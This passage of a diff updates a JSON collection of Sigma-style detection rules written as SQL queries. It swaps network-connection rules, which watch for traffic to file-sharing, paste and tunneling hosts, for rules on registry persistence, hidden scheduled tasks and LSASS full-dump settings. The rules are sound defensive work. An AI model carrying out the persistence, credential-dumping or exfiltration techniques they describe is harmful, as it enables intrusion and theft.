'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (NewProcessName = '') OR 
(NewProcessName = '')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\Autorun%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\CleanupString%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PreCleanupString%' ESCAPE '\\') AND (NewValue LIKE '%cmd%' ESCAPE '\\' OR NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%wsl%' ESCAPE '\\' OR NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_susp_rdp.yml" + "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml" }, { - "title": "Microsoft Binary Suspicious Communication Endpoint", - "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "title": "Potential Persistence Via GlobalFlags", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", "status": "test", - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.privilege_escalation", + "attack.persistence", + "attack.defense_evasion", + "attack.t1546.012", + "car.2013-01-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND 
(DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com/attachments/' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com/raw/' ESCAPE '\\' OR DestinationHostname LIKE '%.ghostbin.co/' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\') AND (NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" ], - "filename": "net_connection_win_binary_susp_com.yml" + "filename": "registry_set_persistence_globalflags.yml" }, { - "title": "Communication To Ngrok Tunneling Service", - 
"id": "1d08ac94-400d-4469-a82f-daee9a908849", - "status": "experimental", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Registry Modification to Hidden File Extension", + "id": "5df86130-4e95-4a54-90f7-26541b40aec2", + "status": "test", + "description": "Hides the file extension through modification of the registry", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Legitimate use of ngrok" + "Administrative scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)')))" ], - "filename": "net_connection_win_ngrok_tunnel.yml" + "filename": "registry_set_hidden_extention.yml" }, { - 
"title": "Communication To Mega.nz", - "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "status": "test", - "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", + "status": "experimental", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate use of mega.nz uploaders and tools" + "Software using weird folders for updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\%' ESCAPE '\\')) AND ((NewValue LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%\\\\%' ESCAPE '\\') OR (NewValue LIKE '\\%Public\\%\\\\%' ESCAPE '\\' OR NewValue LIKE 'wscript%' ESCAPE '\\' OR NewValue LIKE 'cscript%' ESCAPE 
'\\')))" ], - "filename": "net_connection_win_mega_nz.yml" + "filename": "registry_set_susp_run_key_img_folder.yml" }, { - "title": "Dllhost Internet Connection", - "id": "cfed2f44-16df-4bf3-833a-79405198b277", + "title": "COM Hijack via Sdclt", + "id": "07743f65-7ec9-404a-a519-913db7118a8d", "status": "test", - "description": "Detects Dllhost that communicates with public IP addresses", - "author": "bartblaze", + "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", + "author": "Omkar Gudhate", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution", - "attack.t1559.001" + "attack.privilege_escalation", + "attack.t1546", + "attack.t1548" ], "falsepositives": [ - "Communication to other corporate systems that use IP addresses from public address spaces" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' 
ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" ], - "filename": "net_connection_win_dllhost_net_connections.yml" + "filename": "registry_set_comhijack_sdclt.yml" }, { - "title": "Script Initiated Connection", - "id": "08249dc0-a28d-4555-8ba5-9255a198e08c", + "title": "Add Port Monitor Persistence in Registry", + "id": "944e8941-f6f6-4ee8-ac05-1c224e923c0e", "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection. 
Adversaries may use script to download malicious payloads.", + "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.\nA port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.\n", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\%' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor v4.0\\\\Driver%' ESCAPE '\\' AND NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (TargetObject LIKE '%Control\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver%' ESCAPE '\\') OR (TargetObject LIKE '%Control\\\\Print\\\\Environments\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Drivers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\VNC Printer%' ESCAPE '\\')))" ], - "filename": "net_connection_win_script.yml" + "filename": "registry_set_add_port_monitor.yml" }, { - "title": "Suspicious Program Location with Network Connections", - "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", - "status": "test", - "description": "Detects programs with network connections running in suspicious files system 
locations", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Hide Schedule Task Via Index Value Tamper", + "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "status": "experimental", + "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": 
"net_connection_win_susp_prog_location_network_connection.yml" + "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" }, { - "title": "Notepad Making Network Connection", - "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", - "status": "test", - "description": "Detects suspicious network connection by Notepad", - "author": "EagleEye Team", + "title": "Enable Local Manifest Installation With Winget", + "id": "fa277e82-9b78-42dd-b05c-05555c7b6015", + "status": "experimental", + "description": "Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", "attack.defense_evasion", - "attack.t1055" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Administrators or developers might enable this for testing purposes or to install custom private packages" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\AppInstaller\\\\EnableLocalManifestFiles' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_notepad_network_connection.yml" + "filename": "registry_set_winget_enable_local_manifest.yml" }, { - "title": "Potential Persistence Via DLLPathOverride", - "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", - "status": "experimental", - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "author": "Nasreddine Bencherchali (Nextron 
Systems)", + "title": "Changing RDP Port to Non Standard Number", + "id": "509e84b9-a71a-40e0-834f-05470369bd1e", + "status": "test", + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (NewValue = 'DWORD (0x00000d3d)'))" ], - "filename": "registry_set_persistence_natural_language.yml" + "filename": "registry_set_change_rdp_port.yml" }, { - "title": "Potential Persistence Via Visual Studio Tools for Office", - "id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", + "title": "Lsass Full Dump Request Via DumpType Registry Settings", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", "status": "experimental", - "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", - "author": 
"Bhabesh Raj", + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "author": "@pbssubhash", "tags": [ - "attack.t1137.006", - "attack.persistence" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate Addin Installation" + "Legitimate application that needs to do a full dump of their process" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Word\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Excel\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Powerpoint\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\VSTO\\\\Security\\\\Inclusion\\\\%' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' 
ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000002)')" ], - "filename": "registry_set_persistence_office_vsto.yml" + "filename": "registry_set_lsass_usermode_dumping.yml" }, { - "title": "Wow6432Node CurrentVersion Autorun Keys Modification", - "id": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", + "title": "Classes Autorun Keys Modification", + "id": "9df5f547-c86a-433e-b533-f2794357e242", "status": "experimental", "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", 
@@ -33005,334 +32721,371 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\SharedTaskScheduler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewProcessName LIKE '%C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Wow6432Node\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}\\\\%' ESCAPE '\\') OR (NewValue LIKE '%-A251-47B7-93E1-CDD82E34AF8B}' ESCAPE '\\' OR NewValue = 'grpconv -o' OR NewValue LIKE 
'%C:\\\\Program Files%' ESCAPE '\\' AND NewValue LIKE '%\\\\Dropbox\\\\Client\\\\Dropbox.exe%' ESCAPE '\\' AND NewValue LIKE '% /systemstartup%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\\\NoExplorer' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}' ESCAPE '\\' OR TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{7037b699-7382-448c-89a7-4765961d2537}' ESCAPE '\\') AND NewValue LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\' AND NewValue LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewValue LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\\\windowsdesktop-runtime-%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\VC\\_redist.x64.exe' ESCAPE '\\' AND NewValue LIKE '%}\\\\VC\\_redist.x64.exe\" /burn.runonce' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\winsdksetup.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AspNetCoreSharedFrameworkBundle-%' ESCAPE '\\') AND NewValue LIKE '% /burn.runonce' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND 
